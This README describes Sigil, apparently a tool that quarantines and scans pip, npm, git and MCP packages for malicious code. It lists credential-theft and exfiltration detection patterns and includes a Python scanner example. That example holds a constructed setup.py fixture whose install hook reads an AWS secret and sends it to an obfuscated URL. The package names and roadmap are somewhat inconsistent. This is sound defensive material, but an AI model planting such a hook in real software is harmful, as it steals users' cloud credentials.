@reece_nomark/sigil
v1.0.2
Automated security auditing for AI agent code - quarantine-first scanning for pip, npm, git repos, and MCP servers
Sigil scans repositories, packages, MCP servers, skills, and agent tooling for malicious patterns before they reach your working environment. Nothing runs until it's been scanned, scored, and explicitly approved.
The AI tooling ecosystem moves fast. Developers clone repos from tutorials, install MCP servers with 12 GitHub stars, and pull agent skills from Discord — all of which get direct access to API keys, databases, and cloud credentials. Traditional dependency scanners catch known CVEs but miss the real threat: intentionally malicious code designed to exfiltrate credentials, establish backdoors, or execute arbitrary commands via install hooks.
Sigil fills this gap with a quarantine-first approach.
Quick Install
Homebrew (macOS/Linux):

```sh
brew tap nomarj/tap
brew install sigil
```

npm (All platforms):

```sh
npm install -g @nomark/sigil
```

Cargo (Rust):

```sh
cargo install sigil
```

curl installer:

```sh
curl -sSL https://sigilsec.ai/install.sh | sh
```

Docker:

```sh
docker pull nomark/sigil:latest
docker run --rm -v $(pwd):/workspace nomark/sigil scan .
```

→ See all installation methods
How It Works
```
┌──────────────┐     ┌──────────────┐     ┌──────────────┐
│  You run a   │────▶│    Sigil     │────▶│   Clean?     │
│  command     │     │  quarantines │     │   Approve.   │
│              │     │  & scans     │     │   Dirty?     │
│  gclone      │     │              │     │   Reject.    │
│  safepip     │     │  6 phases.   │     │              │
│  safenpm     │     │  <3 seconds. │     │  You decide. │
└──────────────┘     └──────────────┘     └──────────────┘
```

Sigil runs six analysis phases on every scan:
| Phase | What It Catches |
|-------|----------------|
| Install Hooks | setup.py cmdclass, npm postinstall, Makefile targets that execute on install |
| Code Patterns | eval(), exec(), pickle.loads, child_process, dynamic imports |
| Network / Exfil | Outbound HTTP, webhooks, socket connections, DNS tunnelling |
| Credentials | ENV var access, .aws, .kube, SSH keys, API key patterns |
| Obfuscation | Base64 decode, charCode, hex encoding, minified payloads |
| Provenance | Git history depth, author count, binary files, hidden files |
Each finding is weighted and scored. You get a clear verdict:
| Score | Verdict | What Happens |
|-------|---------|--------------|
| 0 | CLEAN | Auto-approve (configurable) |
| 1–9 | LOW RISK | Approve with review |
| 10–24 | MEDIUM RISK | Manual review required |
| 25–49 | HIGH RISK | Blocked, requires override |
| 50+ | CRITICAL | Blocked, no override |
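To make the phase and verdict tables concrete, here is an added example (not Sigil's own code, which ships as a Rust binary): a minimal weighted pattern scanner in Python that applies rules grouped by the phases above to a constructed setup.py and maps the total score onto the verdict bands. The rule regexes and weights are assumptions for the illustration; Sigil's real rule table is not on this page.

```python
import re

# Detection rules grouped by scan phase: phase -> (weight per hit, regexes).
# Weights and patterns are assumptions for this example, not Sigil's rule set.
RULES = {
    "install_hooks": (15, [r"\bcmdclass\s*=", r'"postinstall"\s*:']),
    "code_patterns": (10, [r"\beval\s*\(", r"\bexec\s*\(", r"\bpickle\.loads\b", r"\bchild_process\b"]),
    "network_exfil": (10, [r"\burlopen\s*\(", r"\brequests\.post\s*\(", r"\bsocket\.connect\b"]),
    "credentials":   (12, [r"\bos\.environ\b", r"\.aws\b", r"\.kube\b", r"\bid_rsa\b"]),
    "obfuscation":   (8,  [r"\bb64decode\s*\(", r"\bfromCharCode\b", r"\\x[0-9a-fA-F]{2}"]),
}

# Verdict bands from the README's score table (lower bound, label).
VERDICTS = [(0, "CLEAN"), (1, "LOW RISK"), (10, "MEDIUM RISK"), (25, "HIGH RISK"), (50, "CRITICAL")]

def scan_text(text):
    """Scan one file's contents; return (total score, list of findings).
    Each finding is (phase, pattern, line_number, weight)."""
    findings = []
    for phase, (weight, patterns) in RULES.items():
        for pat in patterns:
            for m in re.finditer(pat, text):
                line_no = text.count("\n", 0, m.start()) + 1
                findings.append((phase, pat, line_no, weight))
    return sum(f[3] for f in findings), findings

def verdict(score):
    """Map a score onto the highest verdict band whose lower bound it reaches."""
    label = VERDICTS[0][1]
    for lower_bound, name in VERDICTS:
        if score >= lower_bound:
            label = name
    return label

# Constructed fixture: a setup.py with an install hook that reads an env var,
# decodes an obfuscated value and makes an outbound request (URL elided).
SUSPICIOUS_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install
import os, base64, urllib.request
class PostInstall(install):
    def run(self):
        token = os.environ.get("AWS_SECRET_ACCESS_KEY")
        urllib.request.urlopen(base64.b64decode(b"..."), data=token)
setup(name="cool-agent-toolkit", cmdclass={"install": PostInstall})
"""
# Constructed fixture: a plain setup.py with no hooks or suspicious calls.
CLEAN_SETUP_PY = 'from setuptools import setup\nsetup(name="hello", version="1.0")\n'

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SETUP_PY), ("clean", CLEAN_SETUP_PY)):
        score, findings = scan_text(src)
        print(name, score, verdict(score), [(f[0], f[2]) for f in findings])
```

The suspicious fixture trips one rule in each of four phases (15 + 12 + 10 + 8 = 45), landing in HIGH RISK, while the clean fixture scores 0.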
Usage
Core Commands
```sh
# Clone a repo into quarantine, scan it, get a verdict
sigil clone https://github.com/someone/cool-mcp-server

# Download and scan a pip package before installing
sigil pip some-agent-toolkit

# Download and scan an npm package before installing
sigil npm langchain-community-plugin

# Scan a directory or file already on disk
sigil scan ./downloaded-skill/

# Download and scan any URL
sigil fetch https://example.com/agent-tool.tar.gz

# Manage quarantine
sigil list              # See all quarantined items
sigil approve abc123    # Move approved code out of quarantine
sigil reject abc123     # Permanently delete quarantined code
```

Shell Aliases
After running sigil install, these aliases are available in every terminal session. Use the commands you already know — Sigil protects you automatically:
| Alias | What It Does |
|-------|-------------|
| gclone <url> | git clone with quarantine + scan |
| safepip <pkg> | pip install with scan first |
| safenpm <pkg> | npm install with scan first |
| safefetch <url> | Download + quarantine + scan |
| audithere | Scan current directory |
| qls | Quarantine status |
| qapprove / qreject | Approve or reject most recent item |
Git Hooks
```sh
# Auto-scan any repo on clone (global git hook)
sigil install --git-hooks
```

IDE & Agent Integrations
Sigil works where you work. Install the plugin for your editor, or connect AI agents via MCP:
| Integration | Coverage | Install |
|-------------|----------|---------|
| VS Code / Cursor / Windsurf | Scan workspace, files, selections, packages. Findings in Problems panel. | plugins/vscode |
| JetBrains IDEs | IntelliJ, WebStorm, PyCharm, GoLand, CLion, etc. Tool window + inline annotations. | plugins/jetbrains |
| Claude Code (MCP) | 6 tools: scan, scan_package, clone, quarantine, approve, reject. | plugins/mcp-server |
| GitHub Actions | Run Sigil as a CI check on every PR. | action.yml |

```json
{
  "mcpServers": {
    "sigil": {
      "command": "node",
      "args": ["/path/to/sigil/plugins/mcp-server/dist/index.js"]
    }
  }
}
```

Build the MCP server first if you haven't already:

```sh
cd plugins/mcp-server && npm install && npm run build
```

npx @nomark/sigil-mcp-server will be available once the package is published to npm.
Threat Intelligence
When authenticated (sigil login), Sigil connects to a community-powered threat intelligence database. Every scan from every user contributes anonymised pattern data. When someone flags a malicious package, the threat signature propagates to all users within minutes.
No source code is ever transmitted — only pattern match metadata (which rules triggered, file types, risk scores).
Offline mode: All six scan phases run locally without authentication. Threat intelligence lookups are skipped, but you still get full local analysis.
```sh
# Authenticate to enable threat intel
sigil login
```

Learn more about authentication →
Why Not [Existing Tool]?
| Capability | Sigil | Snyk | Socket.dev | Semgrep | CodeQL |
|-----------|-------|------|-----------|---------|--------|
| Quarantine workflow | ✅ | ❌ | ❌ | ❌ | ❌ |
| AI agent / MCP focus | ✅ | ❌ | Partial | ❌ | ❌ |
| Install hook scanning | ✅ | ❌ | ✅ | ❌ | ❌ |
| Credential exfil detection | ✅ | ❌ | Partial | Rules needed | Rules needed |
| Multi-ecosystem (pip, npm, git, URL) | ✅ | ✅ | npm only | Any (rules) | GitHub only |
| Community threat intel | ✅ | Advisory DB | ✅ | Community | ❌ |
| Free tier with full CLI | ✅ | Limited | Limited | OSS free | Public repos |
Snyk and Dependabot flag known CVEs in dependency trees — they don't scan source code for intentional malice. Socket.dev is npm-only. Semgrep is a pattern engine, not an end-to-end workflow. CodeQL requires GitHub hosting. None of them quarantine code before it runs.
Pricing
The CLI is free and open source with all six scan phases. Paid tiers add cloud-backed threat intelligence, scan history, team management, and CI/CD integration.
| | Open Source | Pro — $29/mo | Team — $99/mo |
|---|-----------|-------------|--------------|
| Full CLI scanning | ✅ | ✅ | ✅ |
| Cloud threat intelligence | — | ✅ | ✅ |
| Scan history | — | 90 days | 1 year |
| Web dashboard | — | ✅ | ✅ |
| Team management & policies | — | — | Up to 25 seats |
| CI/CD integration | — | — | ✅ |
| Slack / webhook alerts | — | — | ✅ |
Documentation
Comprehensive documentation is available in the docs/ directory:
Getting Started:
- Getting Started Guide — Installation and first scan
- CLI Reference — All commands and options
- Authentication Guide — Connect to Sigil Pro ⭐ NEW
- Configuration — Environment variables and settings
Technical Deep Dives:
- Architecture Overview — System design
- Detection Patterns — What Sigil scans for
- Threat Intelligence 2025 — Current threat landscape
- API Reference — REST API endpoints
Integration Guides:
- CI/CD Integration — GitHub Actions, GitLab CI, etc.
- IDE Plugins — VS Code, JetBrains setup
- MCP Server — Use Sigil as an MCP tool for AI agents
Security Research:
- Case Study: OpenClaw Attack — Real-world supply chain attack
- Prompt Injection Patterns — Detection techniques
- Malicious Signatures — Threat signature database
Roadmap
See ROADMAP.md for the full roadmap.
Today: Quarantine-first scanning for pip, npm, and git repos. Six-phase behavioral detection. Cloud threat intelligence with community reporting and signature sync. Dashboard with scan history, team management, and policy controls. Rust CLI binary, VS Code / Cursor / Windsurf extension (.vsix), JetBrains plugin, MCP server for AI agents, and GitHub Actions integration.
Now: Hosted cloud — sign up and scan without running infrastructure.
Next: Homebrew tap and npm package. Docker image and Go/Cargo scanning. VS Code Marketplace and JetBrains Marketplace listings. Custom scan rules via YAML. Enterprise SSO, RBAC, and audit logs. GitLab, Jenkins, and CircleCI integrations.
Contributing
We welcome contributions. See CONTRIBUTING.md for guidelines.
Security
Found a vulnerability? Please report it responsibly. See SECURITY.md.
License
Apache 2.0 — see LICENSE for details.
